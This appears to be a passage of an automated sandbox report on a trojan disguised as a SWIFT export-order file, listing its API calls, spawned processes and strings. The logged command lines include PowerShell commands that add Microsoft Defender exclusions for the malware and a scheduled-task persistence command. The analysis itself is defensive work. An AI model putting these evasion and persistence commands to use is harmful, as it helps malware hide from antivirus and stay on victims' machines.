          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 0_2_052A5AB0
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C027
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00401030
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C196
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C9AB
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041BB0C
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041BC18
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00408C90
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041C575
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00402D88
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00402D90
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00402FB0
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C0D20
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01491D55
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E4120
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CF900
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DD5E0
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D841F
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481002
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DB090
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FEBB0
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03032B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302DBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030203DA
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0301FA2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9EBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030322AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021002
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0303E824
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030320A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F84120
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030328EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F86E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0303DFCE
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03031FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302D616
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03032EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03032D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03031D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030325DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302D466
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92581
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F60D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CC027
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CC9AB
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CC196
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CBB0C
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006CBC18
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006B8C90
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006B2D88
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006B2D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006B2FB0
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: String function: 013CB150 appears 32 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02F6B150 appears 45 times
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_004185F0 NtCreateFile,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_004186A0 NtReadFile,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00418720 NtClose,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041874A NtClose,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0041871A NtClose,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_004187CB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409560 NtWriteFile,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0140AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0140B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409760 NtOpenProcess,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0140A770 NtOpenThread,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0140A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0140A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409A10 NtQuerySection,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01409A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FAA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FAB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FAA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FAA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FAAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006C85F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006C86A0 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006C8720 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006C87D0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006C874A NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006C871A NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_006C87CB NtAllocateVirtualMemory,
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeBinary or memory string: OriginalFilename vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.262565028.00000000007E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUTF8Encodi.exe. vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000003.238266998.000000000720E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUTF8Encodi.exe. vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.265407210.0000000005C30000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.265647076.0000000005F90000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeBinary or memory string: OriginalFilename vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353532686.000000000164F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.352548275.00000000008F2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUTF8Encodi.exe. vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353038587.0000000000F74000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.264038334.000000000131F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeBinary or memory string: OriginalFilenameUTF8Encodi.exe. vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: AnsPejV.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: AnsPejV.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeReversingLabs: Detection: 35%
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeFile read: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe:Zone.IdentifierJump to behavior
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe"
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeFile created: C:\Users\user\AppData\Roaming\AnsPejV.exeJump to behavior
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3FD.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@16/10@9/4
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeMutant created: \Sessions\1\BaseNamedObjects\Yjstdec
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_01
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeString found in binary or memory: /UTF8Encodi;component/views/addbook.xaml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeString found in binary or memory: views/addcustomer.baml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeString found in binary or memory: views/addbook.baml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeString found in binary or memory: /UTF8Encodi;component/views/addcustomer.xaml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeString found in binary or memory: /UTF8Encodi;component/views/addbook.xaml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeString found in binary or memory: views/addbook.baml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeString found in binary or memory: views/addcustomer.baml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeString found in binary or memory: /UTF8Encodi;component/views/addcustomer.xaml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeString found in binary or memory: Q/UTF8Encodi;component/views/addbook.xamlg/UTF8Encodi;component/views/borrowfrombookview.xaml]/UTF8Encodi;component/views/borrowingview.xamlW/UTF8Encodi;component/views/changebook.xaml_/UTF8Encodi;component/views/changecustomer.xaml[/UTF8Encodi;component/views/customerview.xaml_/UTF8Encodi;component/views/deletecustomer.xamlU/UTF8Encodi;component/views/errorview.xamlY/UTF8Encodi;component/views/smallextras.xamlY/UTF8Encodi;component/views/addcustomer.xaml
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.262649422.0000000001200000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353122475.00000000013A0000.00000040.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp, help.exe, 00000014.00000002.506159305.000000000305F000.00000040.00000001.sdmp, help.exe, 00000014.00000002.505506351.0000000002F40000.00000040.00000001.sdmp
